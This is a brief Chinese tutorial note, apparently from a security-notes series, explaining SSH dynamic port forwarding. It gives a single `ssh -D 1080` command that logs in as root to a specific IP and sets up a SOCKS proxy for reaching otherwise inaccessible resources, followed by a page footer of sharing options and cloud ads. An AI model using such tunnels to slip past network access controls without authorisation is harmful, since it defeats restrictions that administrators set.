动态转发 socks (袜子) 代理 把远程主机设置成代理,来代理访问不能访问的资源。在地机器上分配了一个监听端口, 一旦这个端口上有了连接, 该连接就经过 ssh 隧道转发出去, 根据应用程序的协议可以判断出远程主机将和哪里连接。 `ssh -qTfnN -D 1080 root@45.32.31.121` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-32.png) ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-33.png)
Jonny
2022年11月4日 11:31
191
0 条评论
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
如遇文档失效,可评论告知,便后续更新!
【腾讯云】2核2G云服务器新老同享 99元/年,续费同价
【阿里云】2核2G云服务器新老同享 99元/年,续费同价(不要✓自动续费)
【腾讯云】2核2G云服务器新老同享 99元/年,续费同价
【阿里云】2核2G云服务器新老同享 99元/年,续费同价(不要✓自动续费)
Markdown文件
Word文件
PDF文档
PDF文档(打印)
分享
链接
类型
密码
更新密码
有效期